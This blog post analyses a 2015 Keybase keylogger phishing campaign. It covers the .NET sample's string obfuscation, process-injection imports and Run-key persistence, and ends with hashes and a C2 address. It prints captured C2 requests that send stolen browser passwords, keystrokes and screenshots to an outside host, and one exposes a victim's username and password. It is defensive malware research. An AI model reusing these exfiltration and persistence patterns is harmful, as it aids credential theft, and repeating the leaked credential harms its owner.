Monday, October 12, 2015

Keybase Logger/Clipboard/CredsStealer campaign

While checking my email another day i came across a phish email that seemed quite suspicious. see below:





































It came with compressed file named Product_details.gz. when extracted; it presented a file named Payment_45476.scr. This file is windows executable which was .net compiled, The file was then opened with a tool called ILSPY in order to analyze its inner workings.
- Looking at its main function it seems it created two threads:








 The function below looks to be using a primitive form of obfuscation that consist on reversing  strings.








Looking at the function below; the malware uses an Encryption class that handles the decryption of several strings found throughout the code see below.

Looking at the function below, it seems it invokes the DecryptText function declared on the Encryption class.











The decoded data corresponds the imports the malware will be using:
  • CreateProcessA  
  • GetThreadContext 
  • SetThreadContext 
  • Wow64SetThreadContext 
  • ReadProcessMemory 
  • WriteProcessMemory 
  • NtUnmapViewOfSection 
  • VirtualAllocEx 
  • ResumeThread
When this sample was executed it was clear the sample had malicious intents.It established persistence by copying itself to the startup folder and setting the autorun registry key at startup. The malware names itself "Important.exe"  which on looking at the code it seems a static value set by the author. see below for registry and file activity.
 [CreateFile] Payment_45476.exe:1316 > %AllUsersProfile%\Important.exe     [MD5: 7c6a2697df26582b438c21ee7ce5b0b1]  
 [RegSetValue] Payment_45476.exe:1316 > HKCU\Software\Microsoft\Windows\CurrentVersion\Run\50057d8e6fa9271dc2110b90bda7f871 = C:\ProgramData\Important.exe  

The malware then starts to reach out to its c2. The requests indicate the malware has the following capabilities:

  • Takes a screenshot of the current working window
  • Acts as a keylogger and credential stealer.
  • Captures clipboard content. 
 GET /wp-includes/css/keybase/post.php?type=notification&machinename=PETERPC&machinetime=11:58%20PM  
 HTTP/1.1  
 "steals passwords from chrome password cache"  
 GET /wp-includes/css/keybase/post.php?type=passwords&machinename=PETERPC&application=Chrome&link=http://gsl8411.ru.swtest.ru/ru-ru/user&username=polloloco&password=zi25XgKY  
 HTTP/1.1  
 "it has keylogging capabilities"  
 GET /wp-includes/css/keybase/post.php?type=keystrokes&machinename=PETERPC&windowtitle=Filter&keystrokestyped=teststringt&machinetime=12:00%20AM  
 HTTP/1.1  
 POST /wp-includes/css/keybase/image/upload.php HTTP/1.1  
 Content-Type: multipart/form-data; boundary=---------------------8d2d03db831e930  
 Host: examgist.com  

On looking further to the c2 callbacks, it was noticed the locations in which the screenshots were shared was world readable. See sample below:





































The login panel was also available :




















In conclusion ,this malware is considered primitive based on its design. however, it can certainly cause damage  its kelogging, screen sharing  and credential stealing capabilities make it very attractive to skiddies. thank you for reading


MD5:
7c6a2697df26582b438c21ee7ce5b0b1  Payment_45476.scr
398af2fd86ce37d6d3052eb7503b2790  Order_25464.scr
78c4256eb2003db620a45adba44f404c  Order_34002.gz
9dada7b67f5066e6f5d394222240beb9  Product_details.gz

C2:
http://examgist[.]com/wp-includes/css/keybase/login.php


VT:
https://www.virustotal.com/en/file/2d1009dbaecc2f0dd543adb812d55726656843ea1a66058059eb3fbd088b2a5c/analysis/


No comments:

Post a Comment